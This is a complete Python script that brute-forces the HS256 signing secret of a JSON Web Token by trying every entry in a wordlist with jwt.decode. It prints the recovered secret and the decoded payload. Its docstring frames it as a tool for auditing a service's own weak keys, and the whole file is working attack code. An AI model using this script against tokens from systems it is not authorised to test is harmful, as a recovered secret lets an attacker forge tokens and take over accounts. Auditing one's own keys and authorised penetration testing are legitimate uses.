#!/usr/bin/env python
import jwt
import sys
import os
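def load_wordlist(file_path):
    """Read candidate secrets from a wordlist file, one per line.

    Args:
        file_path: Path to a text file read as UTF-8; undecodable bytes are
            dropped (``errors='ignore'``).

    Returns:
        A list of the file's non-empty lines, each stripped of surrounding
        whitespace, in file order.

    Exits the process with status 1 (after printing a message) when the file
    cannot be opened.
    """
    # Open directly instead of checking os.path.exists() first: the existence
    # check let a directory or an unreadable file through and the subsequent
    # open() then died with a traceback.
    try:
        with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
            stripped = (line.strip() for line in f)
            return [entry for entry in stripped if entry]
    except FileNotFoundError:
        print(f"[!] Wordlist file not found: {file_path}")
        sys.exit(1)
    except OSError as e:
        print(f"[!] Cannot read wordlist {file_path}: {e}")
        sys.exit(1)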
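def brute_force_jwt(token, secrets):
    """Try each candidate secret as the HS256 signing key of *token*.

    Intended for auditing whether a service's own HS256 signing key is a
    weak, wordlist-derived value.

    Args:
        token: A compact-serialized JWT (header.payload.signature).
        secrets: Iterable of candidate secret strings, tried in order.

    Returns:
        The first candidate for which ``jwt.decode`` succeeds, or None when
        the header cannot be parsed, the header's ``alg`` is not ``HS256``,
        or no candidate matched. Progress is reported on stdout.
    """
    try:
        header = jwt.get_unverified_header(token)
    except Exception as e:
        print(f"[!] Invalid JWT header: {e}")
        return None
    # Only HS256 tokens are handled; anything else is rejected up front.
    alg = header.get("alg")
    if alg != "HS256":
        print(f"[!] Unsupported algorithm: {alg}")
        return None
    for secret in secrets:
        # Keep only the call that can raise inside the try; the success path
        # runs after it.
        try:
            decoded = jwt.decode(token, secret, algorithms=["HS256"])
        except jwt.exceptions.InvalidSignatureError:
            # Wrong candidate.
            continue
        except Exception:
            # Deliberately best-effort: any other decode failure for this
            # candidate counts as a non-match rather than aborting the run.
            continue
        print(f"[+] Secret found: '{secret}'")
        print(f"[+] Payload: {decoded}")
        return secret
    print("[-] No secret matched.")
    return None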
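def main():
    """Command-line entry point: ``<jwt_token> <wordlist.txt>``.

    Loads the wordlist and runs the HS256 secret check against the token.
    Exits with status 1 on a usage error or an unreadable wordlist.
    """
    if len(sys.argv) != 3:
        print(f"Usage: python {sys.argv[0]} <jwt_token> <wordlist.txt>")
        sys.exit(1)
    token = sys.argv[1]
    wordlist_path = sys.argv[2]
    # Named `candidates` rather than `secrets` so the stdlib module of that
    # name is not shadowed.
    candidates = load_wordlist(wordlist_path)
    brute_force_jwt(token, candidates)


if __name__ == "__main__":
    main()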